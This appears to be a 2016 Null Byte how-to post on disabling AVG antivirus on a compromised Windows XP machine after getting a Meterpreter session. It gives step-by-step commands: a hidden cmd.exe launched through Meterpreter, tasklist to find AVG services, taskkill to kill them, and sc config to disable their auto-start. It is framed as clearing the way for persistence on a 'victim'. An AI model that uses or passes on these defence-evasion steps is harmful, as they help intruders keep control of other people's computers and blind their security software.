Header Banner
Null Byte Logo
Null Byte
WonderHowTo Gadget Hacks Next Reality Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker
how to

How to Disable Anti Virus Services After Got Meterpreter Session on Remote PC.

Mar 25, 2016 05:59 PM
Mar 25, 2016 06:11 PM
"How to Disable Anti Virus Services After Got Meterpreter Session on Remote PC." cover image

Hello Friends …

My name is Suresh Senarathna and this is my first "How-To" post,

Now I am going to show you how to stop all antivirus services after got meterpreter session in your victim,

(I'm using MS windows Xp as my victim OS and AVG Antivirus guard as an example)

In meterpreter session we can use "killav" command to kill AVG services which running in victim's PC, but it will not stop all running services of AVG ,

So we going to use "taskkill" command to stop all ruining avg services,

1) First type:

execute –f cmd.exe –c –H

In meterpreter terminal , it will execute hidden cmd on our victim OS.

then type,

interact n

(n=channel number) to interact with it.

Command line interface of Windows XP showing execution of a command.

2) Then type:

tasklist /SVC | find /I "avg"

to find what are the running AVG services.

List of running processes related to AVG antivirus software on a Windows system.

3) After it type:

taskkill /F /IM "avg"

to kill those running services,

Command line output displaying process termination attempts and access denied errors.

But as you can see all those services are not terminated, because some of them are restart itself and those are unable to stop,

4) To verify it type:

sc queryex (service name)

System process query output display showing RUNNING status for avpd and AVGDSAgent services.

5) So we had to stop those services auto-starting itself.to do that, type:

sc config (service name) start=disabled

Command line output showing the disabling of AVG services on a Windows system.

6) Then do taskkill again,

taskkill /F /IM "avg"*

Command line output showing the termination of processes named 'nrgfix.exe' and 'angtray.exe' on a Windows system.

7) Finally type:

tasklist /SVC | find /I "avg"

to verify all avg services are terminated….

Command line interface showing Windows tasklist command output.

Now all the running and auto-starting AVG services are terminated.

So you can create persistence or any other fun things with out having any antivirus guard problem,

(P.S : is any thing I have done wrong way plz correct me, thanks for reading)

You already know how to use your phone. With Gadget Hacks' newsletter, we'll show you how to master it. Each week, we explore features, hidden tools, and advanced settings that give you more control over iOS and Android than most users even know exists.

Sign up for Gadget Hacks Weekly and start unlocking your phone's full potential.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!